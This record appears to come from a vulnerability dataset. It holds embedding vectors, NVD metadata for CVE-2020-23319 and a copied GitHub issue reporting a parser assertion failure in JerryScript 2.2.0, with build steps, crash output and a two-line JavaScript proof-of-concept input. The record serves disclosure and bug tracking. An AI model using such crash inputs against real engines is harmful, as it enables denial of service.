-0.0236701350659132, 0.008321532048285007, 0.005111269652843475, 0.011169345118105412, 0.010311302728950977, 0.03088952600955963, 0.016850177198648453, 0.0009874884271994233, -0.015356000512838364, 0.009652976877987385, 0.025578539818525314, -0.0012889128411188722, -0.009482848457992077, -0.015237649902701378, 0.005784389562904835, 0.005758500192314386, 0.00674229022115469, 0.018536673858761787, 0.020755749195814133, 0.005980407819151878, -0.01307035330682993, -0.02118477039039135, 0.014305638149380684, 0.0032675883267074823, 0.02119956538081169, 0.02577085979282856, -0.0051704454235732555, -0.009579007513821125, -0.004334593657404184, -0.004593485500663519, -0.004549104254692793, 0.0030086960177868605, 0.010281714610755444, -0.011842465028166771, 0.021909669041633606, 0.021761730313301086, -0.0020859306678175926, 0.014727262780070305, 0.010607179254293442, -0.006956800818443298, 0.002524198032915592, 0.019483480602502823, 0.01667265221476555, 0.014202081598341465, 0.010215142741799355, -0.010592385195195675, -0.02037111110985279, 0.019513068720698357, 0.006978991441428661, 0.008580423891544342, 0.012167928740382195, -0.0035801080521196127, -0.018433118239045143, 0.015607495792210102, 0.0005316534079611301, 0.025060756132006645, 0.006353951990604401, 0.008254960179328918, -0.00950503908097744, 0.0007008578977547586, 0.014246462844312191, 0.026776840910315514, -0.00033286126563325524, -0.0015829403419047594, -0.0015958849107846618, 0.013381022959947586, -0.012604347430169582, -0.012730094604194164, 0.02087409980595112, 0.003835301613435149, -0.015148886479437351, -0.0026185086462646723, -0.004600882530212402, 0.0016744771273806691, 0.009549420326948166, -0.0047636148519814014, -0.004438150208443403, 0.02118477039039135, 0.01764904521405697, -0.018166828900575638, 0.0032712866086512804, -0.0009370969492010772, -0.007870320230722427, -0.0029458224307745695, -0.0008095001103356481, 0.0064316196367144585, 0.00233927508816123, -0.0118350675329566, 0.018581056967377663, -0.013573342934250832, 0.007899907417595387, -0.016258424147963524, -0.0034950433764606714, 0.004145971965044737, 0.004512119572609663, -0.003912969026714563, -0.022220339626073837, -0.02029714174568653, 0.020090026780962944, -0.014520148746669292, 0.007064056117087603, -0.025341838598251343, -0.002078533871099353, -0.018285179510712624, 0.008610012009739876, 0.012633934617042542, 0.005040999036282301, -0.0030401330441236496, 0.001432228134945035, -0.02103683352470398, 0.0020877798087894917, 0.01577022857964039, 0.015503938309848309, 0.0073710279539227486, 0.0047044395469129086, -0.004708137828856707, 0.0024058474227786064, -0.023270701989531517, 0.005196334328502417, 0.012944605201482773, 0.005137159023433924, 0.004693344235420227, 0.008365913294255733, -0.0015958849107846618, 0.009608595632016659, 0.011598366312682629, 0.01483821589499712, 0.010681148618459702, -0.0187881700694561, -0.006054376717656851, 0.006834751460701227, 0.004711836110800505, -0.012730094604194164, -0.005673435516655445, -0.013469786383211613, -0.006124647334218025, 0.00017625467444304377, -0.014742055907845497, -0.00092553929425776, -0.01205697562545538, 0.02440982684493065, 0.0007891586283221841, 0.007322947960346937, 0.021687760949134827, 0.012900223955512047, 0.012804063968360424, -0.01003022026270628, -0.016169661656022072, 0.010673752054572105, -0.014416592195630074, -0.0032823821529746056, -0.005673435516655445, -0.014586720615625381, -0.04109727218747139, -0.006017392035573721, 0.005473718978464603, -0.007714984938502312, -0.004593485500663519, 0.006376142613589764, 0.00013638066593557596, -0.01901007816195488, 0.004804297816008329, 0.006420524325221777, 0.009608595632016659, 0.012167928740382195, -0.0042754183523356915, 0.003535726573318243, 0.002170995343476534, 0.013943188823759556, 0.01856626197695732, -0.006220807321369648, 0.011132360436022282, -0.008217975497245789, 0.012412027455866337, 0.014209478162229061, -0.01236764620989561, -0.013196100480854511, 0.009142589755356312, -0.03461757302284241, -0.019024871289730072, 0.013920998200774193, 0.016938941553235054, 0.022338690236210823, 0.01341061107814312, -0.012167928740382195, -0.0004937442135997117, -0.013499374501407146, 0.023773692548274994, 0.0038463969249278307, 0.0019971677102148533, -0.012493393383920193, 0.014867804013192654, -0.011265505105257034, -0.00260926247574389, -0.004046113695949316, 0.05589110776782036, -0.003916667774319649, 0.02862606942653656, -0.001838133903220296, 0.0012362097622826695, -0.000530266494024545, -0.005181540735065937, -0.0074302032589912415, 0.004356784280389547, 0.002919933060184121, -0.005810278467833996, 0.0012260390212759376, 0.01729399338364601, -0.00848426390439272, -0.0028219239320605993, -0.000701782526448369, 0.004171861335635185, -0.00700488081201911, 0.0004641565610654652, -0.016864972189068794, -0.02291565015912056, 0.009275734424591064, 0.03281272575259209, -0.015163680538535118, -0.0037151016294956207, -0.006461207289248705, 0.016731826588511467, -0.012167928740382195, 0.011805480346083641, -0.007470886688679457, 0.03035694919526577, -0.008373310789465904, -0.011576175689697266, -0.004508421290665865, 0.007870320230722427, 0.0220132265239954, -0.0015690710861235857, 0.017101673409342766, 0.0015367096057161689, -0.0012602497590705752, -0.0047636148519814014, 0.007567046210169792, -0.025060756132006645, 0.004316101316362619, 0.004079400096088648, 0.004449245985597372, -0.011213726364076138, 0.004615676589310169, 0.013018574565649033, 0.014623705297708511, 0.005037300754338503, 0.0047673131339251995, -0.008772743865847588, 0.01645074412226677, -0.00942367222160101, 0.017027704045176506, 0.011820273473858833, -0.01705729216337204, -0.016391567885875702, -0.01608089916408062, -0.011687129735946655, -0.009068620391190052, -0.008158800192177296, -0.015074917115271091, -0.02155461721122265, 0.003262040438130498, 0.014889994636178017, 0.024690909311175346, -0.01003022026270628, 0.03328612819314003, 0.003537575714290142, 0.005662340205162764, -0.019661005586385727, -0.0008501831907778978, -0.0015875634271651506, -0.010695942677557468, 0.01772301457822323, 0.007237883750349283, 0.011376459151506424, 0.009342306293547153, -0.001403565052896738, -0.007604030892252922, 0.01832956075668335, -0.005695626139640808, -0.007278566714376211, -0.007208296097815037, -0.011361665092408657, 0.0011437482899054885, -0.020045645534992218, 0.009615992195904255, 0.0204450786113739, -0.00044427733519114554, -0.013432801701128483, -0.010695942677557468, 0.018078066408634186, -0.0020729859825223684, 0.00020965636940672994, -0.01033349335193634, -0.0000950619432842359, 0.005340574309229851, 0.017693426460027695, 0.013610327616333961, -0.018743788823485374, 0.010917849838733673, 0.024291476234793663, 0.008654393255710602, 0.011502206325531006, -0.014283447526395321, 0.00090381084010005, 0.00542933726683259, 0.021702555939555168, -0.011997800320386887, -0.015208061784505844, 0.013802647590637207, 0.02335946448147297, 0.007012277841567993, -0.005632752552628517, 0.0019953183364123106, 0.018226005136966705, 0.00415336899459362, -0.016347186639904976, -0.01480862870812416, 0.0375763401389122, 0.01901007816195488, 0.012389836832880974, -0.008735759183764458, -0.007700190879404545, 0.017190435901284218, 0.0037594831082969904, 0.0016190002206712961, -0.01333664171397686, -0.012559965252876282, 0.016998115926980972, 0.009445863775908947, -0.019749769940972328, 0.012042181566357613, -0.010533209890127182, 0.02538621984422207, 0.021525029093027115, -0.0034506618976593018, -0.004826488438993692, 0.039499539881944656, -0.008158800192177296, 0.006557367276400328, -0.015962546691298485, 0.02540101483464241, -0.011332076974213123, 0.018285179510712624, -0.022634567692875862, -0.005695626139640808, 0.004072003066539764, 0.02608153037726879, 0.014549735933542252, 0.005344272591173649, -0.0026129609905183315, -0.005950820166617632, 0.00036499163252301514, 0.01563708297908306, 0.0035856557078659534, -0.012027387507259846, 0.004800599534064531, 0.0015958849107846618, 0.005562481936067343, 0.011036200448870659, 0.005714118480682373, 0.0015487296041101217, 0.0014756850432604551, -0.0036577756982296705, 0.015126695856451988, 0.0004604581044986844, -0.03275354951620102, 0.001442398875951767, 0.0002261838671984151, -0.008861507289111614, 0.014675484038889408, 0.013395817019045353, 0.014549735933542252, -0.0021247644908726215, 0.00804044958204031, 0.005558783188462257, 0.01483821589499712, -0.003802015446126461, -0.01537079457193613, 0.017471518367528915, 0.046689342707395554, 0.00043780505075119436, -0.008617408573627472, -0.003853793954476714, 0.018166828900575638, -0.008476867340505123, -0.0006574010476469994, -0.02260497957468033, 0.0014451727038249373, -0.0040350183844566345, -0.007655809633433819, 0.010466638021171093, 0.007707587908953428, 0.0051926360465586185, 0.01578502170741558, -0.004364181309938431, 0.006464905571192503, -0.02840416319668293, -0.00849166139960289, 0.01389880757778883 ]
238
CVE-2020-23319
2021-06-10T23:15:08.137000
There is an Assertion in '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags >> CBC_STACK_ADJUST_SHIFT)) <= context_p->stack_depth' in parser_emit_cbc_backward_branch in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3834" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3834
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision a56e31f ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g \ --strip=off --system-allocator=on --logging=on \ --linker-flag=-fuse-ld=gold --error-messages=on \ --profile=es2015-subset --lto=off --stack-limit=50 ``` ###### Test case ``` function dec(x) { return x - 1 }; for (var i = 11; ((123).toString(37)) = dec (i); i--) {} ``` ###### Output ``` ICE: Assertion '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags >> CBC_STACK_ADJUST_SHIFT)) <= context_p->stack_depth' failed at /home/JerryScript/jerry-core/parser/js/js-parser-util.c(parser_emit_cbc_backward_branch):669. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags >> CBC_STACK_ADJUST_SHIFT)) <= context_p->stack_depth' in parser_emit_cbc_backward_branch
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3834/comments
0
2020-06-03T03:42:30
2020-06-03T13:29:27Z
https://github.com/jerryscript-project/jerryscript/issues/3834
629,668,362
3,834
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Assertion '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags >> CBC_STACK_ADJUST_SHIFT)) <= context_p->stack_depth' in parser_emit_cbc_backward_branch Issue date: --- start body --- ###### JerryScript revision a56e31f ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g \ --strip=off --system-allocator=on --logging=on \ --linker-flag=-fuse-ld=gold --error-messages=on \ --profile=es2015-subset --lto=off --stack-limit=50 ``` ###### Test case ``` function dec(x) { return x - 1 }; for (var i = 11; ((123).toString(37)) = dec (i); i--) {} ``` ###### Output ``` ICE: Assertion '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags >> CBC_STACK_ADJUST_SHIFT)) <= context_p->stack_depth' failed at /home/JerryScript/jerry-core/parser/js/js-parser-util.c(parser_emit_cbc_backward_branch):669. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337. --- end body ---
1,355
[ -0.011059125885367393, 0.008019176311790943, -0.01004081778228283, -0.0026599555276334286, 0.03905511274933815, -0.014323702082037926, -0.0017904627602547407, 0.03806675598025322, -0.04768078029155731, 0.032945264130830765, 0.005877734627574682, -0.021069994196295738, 0.01611322909593582, 0.01840442232787609, 0.0026973935309797525, 0.0032496009953320026, -0.0013505686074495316, -0.0010913118021562696, 0.009119847789406776, -0.026191484183073044, -0.011650643311440945, -0.019542532041668892, -0.018374470993876457, 0.037887051701545715, -0.02813825011253357, 0.0029051732271909714, 0.01800009422004223, -0.007483816239982843, -0.021863674744963646, -0.0027629095129668713, 0.001389878336340189, 0.01068474818021059, -0.03177720308303833, 0.006424326449632645, 0.03573063388466835, 0.008401041850447655, 0.03444277495145798, 0.04139123111963272, -0.024259693920612335, -0.005252523347735405, -0.010520021431148052, -0.054838888347148895, -0.031807154417037964, 0.03707839548587799, 0.008640644140541553, 0.04555431380867958, 0.027913622558116913, -0.03171730414032936, -0.04264914244413376, 0.006038716994225979, 0.01892855204641819, -0.0026449805591255426, 0.031537603586912155, -0.059421274811029434, 0.03222645819187164, -0.023361187428236008, 0.008386067114770412, -0.006207187194377184, 0.01825467124581337, 0.01315564289689064, -0.014248826541006565, 0.005391043145209551, -0.014158975332975388, 0.009846141561865807, 0.023540887981653214, 0.06008018180727959, -0.011688080616295338, 0.0045112548395991325, 0.00962151400744915, 0.01078957412391901, -0.014503403566777706, -0.00816144049167633, 0.03546108305454254, 0.047501079738140106, -0.0026880339719355106, -0.004724650178104639, 0.012751314789056778, 0.0203362125903368, -0.02402009256184101, -0.006506689358502626, 0.00831867940723896, 0.005200110375881195, -0.03198685497045517, 0.007240470498800278, 0.01557412464171648, -0.009239648468792439, 0.020111585035920143, -0.07631321251392365, 0.009823678061366081, -0.006663928274065256, -0.009688902646303177, 0.01970725692808628, 0.002912660827860236, -0.01224964763969183, -0.0063681695610284805, 0.011875269934535027, -0.030968546867370605, 0.0022500117775052786, -0.031956903636455536, -0.001704355818219483, 0.008019176311790943, 0.010055792517960072, 0.005731726996600628, 0.010392732918262482, 0.015139846131205559, 0.03459252789616585, -0.009074922651052475, -0.01804501935839653, 0.04037292301654816, 0.1286662220954895, -0.013866961002349854, 0.005971328821033239, -0.0038822998758405447, 0.007974251173436642, -0.02210327610373497, 0.01531205978244543, 0.02023138664662838, -0.02127964422106743, -0.012721364386379719, 0.013530020602047443, -0.04549441486597061, 0.0056868018582463264, 0.0025981832295656204, 0.007581154350191355, -0.0017155871028080583, 0.02548765391111374, 0.017985118553042412, -0.005563256796449423, 0.015828700736165047, -0.02330128662288189, -0.06990385800600052, 0.0021264669485390186, -0.0014909603632986546, -0.016412731260061264, 0.05516834184527397, 0.01196512021124363, -0.006057436112314463, 0.028827104717493057, -0.03342446684837341, -0.03495192900300026, -0.0296956617385149, -0.017401089891791344, 0.05831311643123627, 0.01644268073141575, -0.0012410630006343126, 0.020141536369919777, -0.009756290353834629, 0.04336794838309288, -0.02168397419154644, 0.016652332618832588, -0.014990095049142838, 0.0023904035333544016, 0.008041638880968094, -0.015147333964705467, 0.049058493226766586, -0.014967632479965687, 0.007656029891222715, 0.026655713096261024, 0.028677353635430336, 0.007719674147665501, -0.04112168028950691, -0.031118297949433327, -0.014548328705132008, 0.011238827370107174, -0.03156755119562149, 0.006574077531695366, -0.021309595555067062, 0.016457656398415565, 0.002070310292765498, 0.021908599883317947, 0.0013028354151174426, 0.018074968829751015, 0.008992559276521206, 0.012549150735139847, -0.016307905316352844, 0.0024933575186878443, 0.017925217747688293, 0.0018456835532560945, 0.018584122881293297, -0.01752088963985443, -0.0066751595586538315, 0.010123181156814098, -0.009718853048980236, -0.008955121971666813, 0.026910290122032166, -0.041780583560466766, 0.000697278999723494, -0.023256361484527588, -0.00401707598939538, -0.035550933331251144, -0.0041705709882080555, 0.011897732503712177, 0.0077121867798268795, -0.016682283952832222, 0.00015267603157553822, 0.01570890098810196, -0.010512533597648144, -0.014368627220392227, -0.0009289254085160792, -0.01627795584499836, 0.06547122448682785, -0.027599144726991653, -0.02246267907321453, -0.010257956571877003, -0.002813450526446104, -0.006514177192002535, -0.00018087137141264975, -0.00967392697930336, 0.028048399835824966, -0.00023983590654097497, -0.028168199583888054, -0.007626079488545656, 0.029710637405514717, -0.03531133383512497, -0.0025064607616513968, 0.008985071443021297, -0.0016388396034017205, 0.025802131742239, -0.019272979348897934, -0.0027554219122976065, 0.024154867976903915, -0.008603205904364586, -0.02845272794365883, -0.00969638954848051, -0.040073420852422714, -0.015903577208518982, -0.027913622558116913, 0.018224719911813736, -0.04327809438109398, 0.03246605768799782, 0.0027423189021646976, 0.00721800746396184, 0.0008002329850569367, 0.018943525850772858, 0.011448479257524014, 0.01949760504066944, -0.033723969012498856, 0.0038373745046555996, -0.013073279522359371, -0.005117747001349926, -0.009681414812803268, 0.007764599751681089, -0.07092216610908508, -0.03561083599925041, 0.011089076288044453, 0.01918312907218933, -0.01654750667512417, -0.0074576097540557384, -0.03600018844008446, -0.0022986808326095343, -0.028048399835824966, -0.014031686820089817, -0.005338630173355341, -0.03459252789616585, 0.015843676403164864, -0.0029706894420087337, -0.006866092327982187, 0.03255591168999672, -0.007266676984727383, -0.01612820476293564, 0.026461036875844002, 0.006461764220148325, -0.04211003705859184, 0.014263801276683807, 0.008528330363333225, -0.007195544894784689, -0.020261336117982864, 0.014533353969454765, -0.01513235829770565, -0.03462247550487518, 0.044026851654052734, -0.02163904719054699, -0.02786869741976261, -0.006809935439378023, -0.014600741676986217, 0.015409397892653942, -0.00008862229151418433, 0.014054149389266968, -0.019617406651377678, -0.01326046884059906, 0.006263343617320061, 0.03890535980463028, 0.031597502529621124, 0.05450943484902382, 0.03177720308303833, 0.008221340365707874, 0.027703970670700073, 0.0026674431283026934, -0.02018646150827408, -0.030339593067765236, -0.02553257904946804, -0.021803773939609528, -0.018389446660876274, -0.005896453280001879, 0.003863580757752061, 0.0032907824497669935, 0.008183903060853481, -0.0472315289080143, -0.013537508435547352, -0.01250422466546297, -0.017610739916563034, -0.02984541282057762, -0.007727161515504122, -0.008371091447770596, -0.027119942009449005, 0.004627312067896128, 0.00008926575537770987, 0.03222645819187164, -0.008176415227353573, 0.0034498930908739567, 0.03603013604879379, -0.05885222181677818, 0.014585766941308975, -0.02142939530313015, -0.01669725775718689, -0.01585865207016468, 0.03291531279683113, -0.030698996037244797, -0.01648760586977005, 0.014226363971829414, -0.03899521008133888, -0.03333461657166481, -0.03345441818237305, 0.03941451385617256, 0.0482797846198082, -0.01269141398370266, -0.005814090371131897, 0.01741606369614601, -0.04603351652622223, 0.00977875292301178, 0.002287449548020959, -0.04264914244413376, -0.03204675763845444, -0.004915582947432995, -0.023675663396716118, -0.055258192121982574, -0.04019322246313095, 0.045224860310554504, 0.030309641733765602, -0.023361187428236008, -0.00983116589486599, -0.012346985749900341, -0.0009111424442380667, -0.002869607415050268, 0.006300781387835741, -0.024094967171549797, -0.000681835925206542, 0.011538329534232616, 0.018599098548293114, -0.009509201161563396, 0.0009584076469764113, 0.019108252599835396, 0.03956426680088043, -0.0058927093632519245, 0.07415679097175598, -0.049747347831726074, -0.05268247053027153, -0.025457702577114105, 0.008887733332812786, 0.017505913972854614, 0.007637311238795519, -0.023226410150527954, -0.01606830395758152, -0.0026674431283026934, 0.01918312907218933, -0.020560840144753456, 0.03489203006029129, 0.0037419081199914217, -0.022507604211568832, -0.0003839714336208999, -0.05070575699210167, 0.034412823617458344, -0.020980142056941986, -0.002120851306244731, 0.004646030720323324, -0.04073232412338257, -0.001275692950002849, -0.004833220038563013, -0.027703970670700073, 0.03165740147233009, -0.03701849654316902, -0.001944893621839583, 0.044595904648303986, -0.03947441652417183, 0.019842034205794334, 0.005237548146396875, -0.027584170922636986, 0.04243949055671692, -0.003734420519322157, -0.0031092092394828796, -0.015072457492351532, 0.02127964422106743, -0.049387942999601364, -0.04342784732580185, -0.01050504669547081, 0.023076659068465233, -0.02490362338721752, -0.016083277761936188, 0.014136512763798237, -0.04899859055876732, 0.009052460081875324, -0.00736027117818594, 0.028437752276659012, -0.013238005340099335, -0.015948502346873283, 0.046782273799180984, -0.020261336117982864, -0.047201577574014664, -0.004327809438109398, 0.028258051723241806, 0.04582386463880539, -0.04336794838309288, 0.002034744480624795, 0.011186414398252964, 0.0528322234749794, 0.0319269560277462, 0.03719819709658623, -0.015327034518122673, -0.025083325803279877, 0.03246605768799782, -0.008049126714468002, -0.032945264130830765, 0.022402778267860413, -0.01245181169360876, 0.011643155477941036, -0.026326259598135948, -0.012257135473191738, 0.028797155246138573, 0.01810492016375065, -0.004900607746094465, -0.023795465007424355, -0.0017530249897390604, 0.004050769843161106, 0.052922073751688004, -0.01669725775718689, -0.03968406841158867, -0.048399586230516434, -0.035131629556417465, -0.033723969012498856, 0.018164820969104767, 0.033065065741539, 0.03147770091891289, -0.021144868806004524, -0.02319646067917347, 0.01617312990128994, -0.004728394094854593, -0.033664070069789886, 0.013342831283807755, -0.00542099354788661, 0.014346164651215076, -0.017341189086437225, 0.04118157923221588, -0.00792932603508234, -0.00600876659154892, 0.002454047789797187, -0.004290371667593718, -0.03558088466525078, -0.02168397419154644, 0.013013378717005253, -0.013874447904527187, -0.015349498018622398, 0.00972633995115757, -0.01302835438400507, -0.0072966269217431545, -0.011141489259898663, 0.034562576562166214, 0.0024577914737164974, -0.03312496468424797, -0.0060274857096374035, -0.036748941987752914, 0.017401089891791344, 0.017386114224791527, 0.007921838201582432, 0.011208876967430115, 0.009741315618157387, -0.008857782930135727, 0.007191801443696022, -0.03522147983312607, -0.011141489259898663, -0.0074051967822015285, 0.015297085046768188, -0.014705567620694637, -0.014765468426048756, 0.026011783629655838, 0.002708624815568328, -0.014278776943683624, -0.03617988899350166, -0.0038785559590905905, -0.0026431086007505655, 0.01846432313323021, 0.013380269519984722, -0.017206411808729172, -0.008760444819927216, -0.07056276500225067, 0.004953020717948675, 0.014188925735652447, -0.04705182462930679, -0.013889423571527004, 0.04753103107213974, 0.022807106375694275, 0.01903337799012661, -0.022597456350922585, 0.019901933148503304, 0.04570406675338745, 0.004279140383005142, -0.028018448501825333, -0.058223266154527664, 0.04866913706064224, 0.005567000713199377, -0.011762956157326698, -0.01897347718477249, -0.053640879690647125, -0.0004160275566391647, -0.03177720308303833, -0.03267570957541466, -0.028692329302430153, 0.019377805292606354, 0.006079898681491613, 0.03165740147233009, 0.01732621341943741, 0.002727343700826168, -0.028213124722242355, -0.0003137755556963384, 0.02553257904946804, 0.043757300823926926, 0.027269693091511726, 0.02548765391111374, -0.007232982665300369, -0.020500939339399338, -0.03968406841158867, -0.02944108471274376, 0.018344521522521973, -0.01623302884399891, 0.052233219146728516, 0.017640691250562668, 0.012953478842973709, -0.023121584206819534, 0.04031302034854889, 0.00024381367256864905, 0.01897347718477249, 0.0214743223041296, 0.019587457180023193, -0.02746436931192875, 0.022387804463505745, -0.012931016273796558, 0.01328293140977621, -0.01633785478770733, 0.010991738177835941, 0.03719819709658623, 0.025817105546593666, -0.04768078029155731, -0.013178105466067791, -0.0012307676952332258, 0.004050769843161106, -0.01008574292063713, -0.029351234436035156, -0.009187235496938229, 0.020530888810753822, 0.025622429326176643, 0.010048305615782738, 0.004975483287125826, -0.021129893139004707, -0.004492535721510649, -0.005054102744907141, -0.03198685497045517, -0.01909327693283558, -0.020665664225816727, 0.02896188199520111, -0.03641949221491814, 0.012257135473191738, 0.014698079787194729, 0.01648760586977005, 0.02142939530313015, -0.018284620717167854, 0.003472355892881751, 0.010894399136304855, -0.0077720871195197105, -0.007899375632405281, -0.02932128496468067, -0.0015143590280786157, 0.012287085875868797, -0.014675617218017578, -0.028123274445533752, 0.0203811377286911, 0.009172260761260986, -0.033933620899915695, -0.0006575013394467533, -0.008820345625281334, 0.017236363142728806, -0.034412823617458344, -0.026550887152552605, 0.002334246877580881, -0.016262980177998543, -0.009322011843323708, 0.00483696348965168, -0.009636489674448967, -0.02610163390636444, 0.0064542763866484165, 0.028437752276659012, -0.017251336947083473, 0.0023005527909845114, 0.005873990710824728, 0.0296956617385149, -0.027479344978928566, -0.0197671577334404, 0.019048351794481277, -0.015693925321102142, 0.012032508850097656, -0.0021508014760911465, 0.027524270117282867, -0.013866961002349854, 0.025712279602885246, 0.019437706097960472, -0.02008163556456566, -0.007030818611383438, -0.01814984530210495, 0.01245181169360876, 0.00762982340529561, -0.011590742506086826, 0.0197671577334404, 0.011710543185472488, -0.039594218134880066, -0.002798475557938218, -0.005413505714386702, -0.005581975914537907, 0.03974396735429764, -0.028572527691721916, -0.021339545026421547, -0.01331288181245327, -0.035910338163375854, -0.012414374388754368, 0.006967174354940653, -0.010931837372481823, -0.017910243943333626, -0.01814984530210495, 0.028842080384492874, 0.011463453993201256, 0.020560840144753456, -0.017970142886042595, -0.019572481513023376, -0.0072105200961232185, 0.015297085046768188, -0.039085064083337784, -0.011276264674961567, -0.025652380660176277, -0.00007668899343116209, 0.023855365812778473, 0.020575813949108124, 0.012916040606796741, 0.03243611007928848, -0.024319594725966454, -0.015094920992851257, 0.020620739087462425, 0.012856139801442623, 0.012399398721754551, -0.011553305201232433, 0.0319269560277462, 0.05175401270389557, -0.03980386629700661, -0.012279598042368889, -0.03740784898400307, -0.014353652484714985, -0.00785445049405098, 0.011448479257524014, 0.010752135887742043, -0.044386256486177444, -0.01263900101184845, 0.007989225909113884, 0.017610739916563034, 0.028063373640179634, -0.007300370838493109, 0.002639364916831255, 0.01305081695318222, -0.00243720063008368, -0.008408529683947563, -0.009973430074751377, -0.0407622754573822, 0.01011569332331419, -0.010797061026096344, 0.0007155299535952508, -0.008341141976416111, 0.01570890098810196, 0.0160084031522274, 0.021504271775484085, 0.007311602123081684, -0.011343653313815594, -0.009336987510323524, 0.011403553187847137, 0.003768114373087883, -0.008483405224978924, 0.007199288811534643, 0.020770490169525146, 0.04887878894805908, -0.01546929869800806, -0.014757980592548847, -0.016981786116957664, 0.004507510922849178, 0.004043282475322485, -0.010265444405376911, -0.012826190330088139, -0.01747596450150013, 0.0038261429872363806, -0.031238099560141563, 0.011276264674961567, 0.015124870464205742, 0.03722814843058586, 0.0129010658711195, -0.03150765225291252, 0.00806410238146782, 0.01716148667037487, -0.026176508516073227, 0.014585766941308975, -0.0020384881645441055, 0.004058257210999727, 0.005694289226084948, -0.02750929445028305, 0.006884811446070671, -0.010534997098147869, -0.00803415197879076, 0.002858375897631049, -0.019123228266835213, -0.016727209091186523, -0.05651610344648361, -0.012182259932160378, -0.004211752209812403, -0.02054586447775364, -0.0026337492745369673, 0.03489203006029129, 0.004556179977953434, 0.009643977507948875, -0.029785513877868652, -0.021624073386192322, -0.007423915434628725, -0.00007101482333382592, -0.018119893968105316, 0.014750492759048939, -0.000869960873387754, 0.005488381255418062, 0.015514223836362362, 0.0025757206603884697, -0.0024128661025315523, 0.00972633995115757, -0.013515045866370201, -0.01663735881447792, 0.017565814778208733, -0.03546108305454254, -0.002884582383558154, 0.00007867787644499913, -0.024109942838549614, 0.020935216918587685, -0.006663928274065256, 0.01674218289554119, 0.01711656153202057, -0.021923575550317764, 0.003953431732952595, 0.014450990594923496, 0.02324138581752777, -0.010752135887742043, -0.0031616222113370895, 0.01773054152727127, -0.0241398923099041, 0.016787109896540642, 0.0006397183751687407, 0.017146512866020203, 0.014817880466580391, 0.0061996993608772755, 0.024948548525571823, -0.01299840398132801, 0.011201389133930206, 0.006177236791700125, -0.008565768599510193, -0.01690690964460373, -0.027344567701220512, -0.0007347168284468353, 0.014271289110183716, -0.04384715110063553, 0.0027423189021646976, 0.023316260427236557, 0.0014048534212633967, 0.0011343653313815594, -0.023166509345173836, 0.01762571558356285, -0.0004324065812397748, 0.039863768965005875, 0.006143542937934399, 0.008326166309416294, 0.014555816538631916, -0.019677307456731796, 0.012803727760910988, 0.00805661454796791, -0.03345441818237305, -0.027419444173574448, 0.020815417170524597, -0.013956811279058456, -0.011995070613920689, -0.026041733101010323, -0.00816144049167633, 0.04546446353197098, -0.00309423403814435, -0.014735518023371696, 0.034352924674749374, 0.002849016571417451, -0.009614027105271816, 0.0025027168449014425, 0.008228828199207783, -0.009591564536094666, -0.016876960173249245, -0.01871890015900135, -0.006252112332731485, 0.040582574903964996, 0.007809524890035391, -0.01897347718477249, -0.006304525304585695, -0.002077797893434763, -0.002865863498300314, 0.01338775735348463, 0.0026262616738677025, -0.018449347466230392, 0.01850924827158451, 0.01648760586977005, -0.00805661454796791, 0.006323244422674179, 0.03255591168999672, -0.02084536664187908, 0.0027591658290475607, 0.019153177738189697, 0.011381090618669987, -0.00020064320415258408, 0.01695183478295803, -0.0005002625985071063, -0.005402274429798126, 